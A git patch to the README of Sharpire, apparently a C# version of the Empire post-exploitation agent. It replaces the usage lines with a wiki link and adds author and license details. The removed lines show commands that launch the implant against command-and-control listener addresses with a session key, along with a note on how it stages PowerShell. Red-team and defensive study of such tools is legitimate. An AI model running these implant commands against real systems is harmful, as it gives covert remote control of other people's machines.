From 1292ed25a5933ef18977c167bf170c4c4d3cc625 Mon Sep 17 00:00:00 2001 From: Alexander Date: Thu, 14 Mar 2019 01:25:18 -0500 Subject: [PATCH] Update README.md --- README.md | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index f13d1d7..e20ba5c 100644 --- a/README.md +++ b/README.md @@ -1,12 +1,15 @@ -## Sharpire - An implimentation of the Empire Agent in C# +## Sharpire - An Implimentation of the Empire Agent in C# -sharpire.exe \ \ \ +For usage details please see the wiki:
+https://github.com/0xbadjuju/Sharpire/wiki +*Note: This is still in testing. -sharpire.exe "http://192.168.255.100:80" "aRAVQ_z?6PqujiWgf!eNwBZ&G)^h(L/|" "powershell"
-sharpire.exe "http://10.2.2.100:80" "aRAVQ_z?6PqujiWgf!eNwBZ&G)^h(L/|" "dotnet" +### Author, Contributors, and License -*Note: This is still in testing. +Author: Alexander Polce Leary (@0xbadjuju) - 2019 + +License: BSD 3-Clause -This application has two modes of operation, the first use the executable to stage down the PowerShell and executes it in a runspace. The second has the agent exist entirely in a C# application with PowerShell only being executed in modules. +Required Dependencies: None